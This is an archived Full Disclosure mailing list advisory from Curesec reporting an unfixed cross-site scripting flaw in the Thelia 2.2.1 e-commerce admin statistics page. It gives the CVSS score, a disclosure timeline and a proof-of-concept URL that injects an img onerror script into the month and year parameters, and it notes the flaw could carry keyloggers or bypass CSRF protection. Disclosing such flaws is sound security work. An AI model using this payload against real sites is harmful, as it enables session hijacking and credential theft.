lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0M7Fkw-1aHqe42P6E-00x0JF@mrelayeu.kundenserver.de>
Date: Fri, 13 Nov 2015 17:03:21 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Thelia 2.2.1: XSS

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Thelia 2.2.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      info@...lia.net
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

Thelia 2.2.1 suffers from an XSS vulnerability. With this, it is for example
possible to inject JavaScript keyloggers, or to bypass CSRF protection.

3. Proof of Concept


http://localhost/thelia_2.1.5/web/admin/home/stats?month=95<img src=no onerror=alert(1)>&year=20155<img src=no onerror=alert(2)>

4. Solution

This issue has not been fixed by the vendor

5. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Thelia-221-XSS-90.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists